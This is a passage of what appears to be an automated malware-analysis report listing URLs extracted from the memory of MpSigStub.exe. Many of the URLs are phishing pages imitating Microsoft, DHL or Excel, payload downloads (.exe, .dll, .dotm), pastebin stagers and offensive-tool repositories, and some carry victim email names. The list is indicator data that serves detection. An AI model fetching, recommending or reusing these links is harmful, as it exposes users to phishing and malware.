Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://mareyell.org/sfexp/sfexpdbtrack/sfexss/sfexpress/source/index.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://mueblesmaple.com.mx/19.gif
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp	String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://office365.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://onlinebebeksepeti.com/puyo/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/c9fe4/0
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/2STTYftz
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/sf3gviaw
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000024.00000003.6342578169.00000197A421C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://personalizasp.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://picsum.photos/80
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://podcast.oigaprofe.com.mx/wp-includes/sodium_compat/src/Core32/ChaCha20/KlrIU42g.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://postotravessia.com.br/wp-admin/network/redirect/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://property.appskeeper.com/wp-content/plugins/lite-cache/3Rx12s64qbadA.php
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: https://psychedelicassistedsessions.com/f2ewq5kfmdhcsac.exe-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: https://pubupl.com/updates/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://pwndrop.gumtreeza.com/upywreoz/zma.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://quirky-blackwell.23-227-196-69.plesk.page/mail/inbox%3dmessage/1/index.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://raifeisen.co/invoice/id/305674567
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://ramechanicsplus.work/manuel/ywrhbwtvdmfaa2vtcgvylmv1
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://relaja.me/u2viyxn0awfulln0sm9obkbtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://remoteally.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://reneerouleau.us/az/az.doc
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://rnatrixblade.net/nj.php
